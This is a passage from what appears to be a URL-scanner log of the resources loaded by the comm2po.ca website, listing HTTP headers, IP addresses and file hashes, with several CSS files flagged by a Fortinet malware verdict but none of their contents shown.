Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 01:04:48 GMT
etag: "1561d16-167-51d8b81268c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 154
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.7
72.167.59.18200 OK 842 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 6d697557b379a8be1642c819589f2019
1c652197dc61b1841f7e0275964b6bda13d54bed
6b3eb47cf2ab9da6f7de8a969d16006529e27419ffea36315639254b398d212b
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 01:04:48 GMT
etag: "1561d14-b8e-51d8b81268c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 842
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
secure.leadforensics.com/js/147022.js
51.140.49.131200 OK 136 B URL HTTP/1.1 secure.leadforensics.com/js/147022.js
IP 51.140.49.131:0
ASN #8075 MICROSOFT-CORP-MSN-AS-BLOCK
File type ASCII text, with no line terminators
Hash bb5bd93a4a1897303df838a0d514d877
6fef6703a36252ae2eea0126fd9bb8dc85b61f85
c3dcfc6bd153ed707bc55c33d9aad508a355322780b88334a84285646379d1c7
GET /js/147022.js HTTP/1.1
Host: secure.leadforensics.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Server: Kestrel
Request-Context: appId=cid-v1:abe8a76f-f1a2-4b2e-9017-0ea36ffb5c20
Date: Wed, 21 Sep 2022 04:23:38 GMT
Content-Length: 136
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash e5d7d983b288c67e17280c6a1c0d80d9
8a1e575f8b8427e872c1e4c5645d9ce3e5445e52
a08530049c460e7e3cf236a9969b94b4a794d83f3f4279ac43934194f39dedd6
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.comm2po.ca/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.1
72.167.59.18200 OK 9.2 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Unicode text, UTF-8 text, with very long lines (5178), with CRLF line terminators
Hash 3361badac89380e79f6dd34bd51d722a
488ceadd2b9826c4e5aec9cbeb8078c186ee572a
e7514c616f3900dabb277526aea07b2d388be4e0ba0cc90f1a3b6463fe3d75de
GET /wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:01 GMT
etag: "1561498-9b8c-583d3b4f75740-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 9214
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.7
72.167.59.18200 OK 632 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 37b95dba55f47577453aeec1c54578e3
f1e14c33378ffda2923adea90c2283deedcf68f1
ed4aeaeb3c043a422cde365755f5a9a4494f175bb99a2c09fbedc661c3d4b2c5
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 01:04:48 GMT
etag: "1561d15-abb-51d8b81268c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 632
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=Playfair+Display%3A400%2C700%2C400italic%2C700italic%2C900italic&ver=1.0
142.250.74.10200 OK 1.1 kB URL HTTP/2 fonts.googleapis.com/css?family=Playfair+Display%3A400%2C700%2C400italic%2C700italic%2C900italic&ver=1.0
IP 142.250.74.10:0
Hash cfed9daefa6e2bc54f227ddf2c78146a
1b194a8fc484b052cc6db2682d12362062a225df
a2e1193805c46d917537bc386ba6070aa66fa65203d5ba124b08df8e58f96f5a
GET /css?family=Playfair+Display%3A400%2C700%2C400italic%2C700italic%2C900italic&ver=1.0 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 21 Sep 2022 04:23:39 GMT
date: Wed, 21 Sep 2022 04:23:39 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 8ebb267e443b81854ef9a01b3eb6489d
b932e9e5679da5a9160da5429458041765509b52
4ac5aa5b4fb4a85282b825c5c0ed7b1aaf2b39ffe77d69dec5123a84709f3fe2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "4AC5AA5B4FB4A85282B825C5C0ED7B1AAF2B39FFE77D69DEC5123A84709F3FE2"
Last-Modified: Tue, 20 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14479
Expires: Wed, 21 Sep 2022 08:24:58 GMT
Date: Wed, 21 Sep 2022 04:23:39 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 8ebb267e443b81854ef9a01b3eb6489d
b932e9e5679da5a9160da5429458041765509b52
4ac5aa5b4fb4a85282b825c5c0ed7b1aaf2b39ffe77d69dec5123a84709f3fe2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "4AC5AA5B4FB4A85282B825C5C0ED7B1AAF2B39FFE77D69DEC5123A84709F3FE2"
Last-Modified: Tue, 20 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14479
Expires: Wed, 21 Sep 2022 08:24:58 GMT
Date: Wed, 21 Sep 2022 04:23:39 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 8ebb267e443b81854ef9a01b3eb6489d
b932e9e5679da5a9160da5429458041765509b52
4ac5aa5b4fb4a85282b825c5c0ed7b1aaf2b39ffe77d69dec5123a84709f3fe2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "4AC5AA5B4FB4A85282B825C5C0ED7B1AAF2B39FFE77D69DEC5123A84709F3FE2"
Last-Modified: Tue, 20 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14479
Expires: Wed, 21 Sep 2022 08:24:58 GMT
Date: Wed, 21 Sep 2022 04:23:39 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fecaa9082-610c-41c1-ae9a-e453d87828ab.jpeg
34.120.237.76200 OK 10 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fecaa9082-610c-41c1-ae9a-e453d87828ab.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash dab1f2cd68979d2004ba4449d759a341
54ed14436a75ba2aeb8459bad2ce70229aff4203
e782fb5ede547e1b167719068c6821c62414dcb0991bf9ac38285cb3ce8894e3
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fecaa9082-610c-41c1-ae9a-e453d87828ab.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 10038
x-amzn-requestid: 4cf38a70-a706-4e6a-b854-9404727c599d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yxy1mHDCIAMF5-g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632a31bd-5aba5b0640221b302a19781b;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 21:33:49 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: hDCOWNm2vFa9h7BffUJwcwZ6i27jM2qBuSTasH9q_wsQ9oNWhVpQCg==
via: 1.1 5ab5dc09da67e3ea794ec8a82992cc88.cloudfront.net (CloudFront), 1.1 cd858042f70b416ca05e042acf3908a4.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 21:47:24 GMT
etag: "54ed14436a75ba2aeb8459bad2ce70229aff4203"
content-type: image/jpeg
age: 23775
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F62f1d773-46e0-4cf2-8178-3101a22f8b0c.jpeg
34.120.237.76200 OK 7.1 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F62f1d773-46e0-4cf2-8178-3101a22f8b0c.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash c92f202bddcfee6efac41bcc25be5745
9d297544318ff34f839678d8b358290ab6bd62a8
f471aaff7c08c60905cff5b1c9d4b669a3179574493d23d27e681110688af6b2
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F62f1d773-46e0-4cf2-8178-3101a22f8b0c.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7060
x-amzn-requestid: 69e8f4d4-2360-4124-a9e9-9cce3dd43da7
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yx0NWEgmIAMFusQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632a33ee-0f4861c226117d70664b8612;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 21:43:10 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: kj4FQUvvo13Yrwu_bKqee64IMn6X0UXlOJQ3fh40qejOi-3dtCrEYg==
via: 1.1 8dbfaf7df256a75768461d934659b6b2.cloudfront.net (CloudFront), 1.1 35575576af8067e30cfb17c6b9fde8e2.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 21:55:57 GMT
age: 23262
etag: "9d297544318ff34f839678d8b358290ab6bd62a8"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe6be1360-d048-4319-9cac-dfebe92db87f.jpeg
34.120.237.76200 OK 9.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe6be1360-d048-4319-9cac-dfebe92db87f.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 267173c6b4e4e6ae4a84dc08df92f82f
4183102af1963e1edb3aa572c43aeda7d855e9f5
20487bb2e59f2e6afcaaac3e3c4f1dfec9a8ef761403a44f7f92a6b57d143714
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe6be1360-d048-4319-9cac-dfebe92db87f.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9271
x-amzn-requestid: b8139dfc-8f24-41e0-9948-56bad215416c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yx0Q-EkZoAMF_sw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632a3406-4365026f7f832cee0c12e4d7;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 21:43:34 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: rUeMyRv1DxHKmRAc4s-8GkQELQtAO-_lKHB2tjRYSQUSBMJMmDAZcQ==
via: 1.1 28a7186077f9b5270d98dd053f31303e.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 21:56:09 GMT
age: 23250
etag: "4183102af1963e1edb3aa572c43aeda7d855e9f5"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=Raleway%3A400%2C300%2C200%2C100%2C500%2C600%2C700%2C800%2C900&ver=1.0
142.250.74.10200 OK 7.6 kB URL HTTP/2 fonts.googleapis.com/css?family=Raleway%3A400%2C300%2C200%2C100%2C500%2C600%2C700%2C800%2C900&ver=1.0
IP 142.250.74.10:0
Hash dba3112deb85911d98a8113b74d02205
ec18149199f2c830fb4ec9c108882c4cecfcd9ab
b82bb028ec69a106589d6005c933d1241cdcdcf2d5570095b978d64aa04859b7
GET /css?family=Raleway%3A400%2C300%2C200%2C100%2C500%2C600%2C700%2C800%2C900&ver=1.0 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 21 Sep 2022 04:23:39 GMT
date: Wed, 21 Sep 2022 04:23:39 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa6b35a1c-f445-4b05-b56e-ce2ad0ef2a9a.jpeg
34.120.237.76200 OK 6.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa6b35a1c-f445-4b05-b56e-ce2ad0ef2a9a.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 8bae3a7a80ff40df1d701dfc925ddeff
91df60162a8322469cada0dd8eb93619f28aec1a
fab10c7ad4658bc191621d9f2042236a7b6e34448ce5215dde5b8d6a64b52952
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa6b35a1c-f445-4b05-b56e-ce2ad0ef2a9a.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6897
x-amzn-requestid: 280a2e44-c21a-4d78-991b-3328e816d045
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YwWSpE0SoAMFaxw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63299daa-55cb53491be78c4d5bed0462;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 11:02:02 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: eNkM22Xu--qgJdsrH-UrTG5-Ie4nAsyLjiMaJ5ZKIz0bbw7cYrvFjw==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Wed, 21 Sep 2022 02:18:26 GMT
age: 7513
etag: "91df60162a8322469cada0dd8eb93619f28aec1a"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa2a425d5-4fbd-4af0-a85b-75f0878759cb.jpeg
34.120.237.76200 OK 7.5 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa2a425d5-4fbd-4af0-a85b-75f0878759cb.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 4d98acc059a69d51165fb5e0c7430ea3
09bd3300d710c3212483159f8398b84cde09da26
6e38bbb5c79c4f714973e10961d7bad9e7ae8711cf24d68b13a77206f474d2a6
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa2a425d5-4fbd-4af0-a85b-75f0878759cb.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7507
x-amzn-requestid: 2a40c792-8b1b-4476-92de-1fce3df48fc1
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YcCmaHefoAMF4Ow=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63217e28-6b05350006b7f3fb73d1e37a;Sampled=0
x-amzn-remapped-date: Wed, 14 Sep 2022 07:09:28 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: rq4QHCD4EubBKHyCj7jyKqpct5d7U33TvNufqj_w8mWunqQsouoh7w==
via: 1.1 c7c3cdef911c9ee3c1a83a78f425dc5a.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 22:21:54 GMT
age: 21705
etag: "09bd3300d710c3212483159f8398b84cde09da26"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/css/dashicons.min.css?ver=5.4.2
72.167.59.18200 OK 28 kB URL HTTP/2 www.comm2po.ca/wp-includes/css/dashicons.min.css?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (47523)
Hash 467901af02adfb156cdae788ea9e75c9
11a90496b235b04b734018acc1f58c16c75100a5
ce8b34d464d23afa7de1a95c112d0b68a184fde42abf574a45d44b6bcd744236
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/css/dashicons.min.css?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 15 May 2019 16:08:57 GMT
etag: "fe16d5-b9c6-588ef5dded840-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 28359
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/cf7-conditional-fields/style.css?ver=1.9.9
72.167.59.18200 OK 460 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/cf7-conditional-fields/style.css?ver=1.9.9
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash c0ee0b15ff116252262802786cf6fd32
b589fc4077e0d845e0171e4d702e28602e88e0ce
0d0941d884cfe555f99f23140019c2157f09f57a4f69121a13a56dd7b44da5d8
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/cf7-conditional-fields/style.css?ver=1.9.9 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
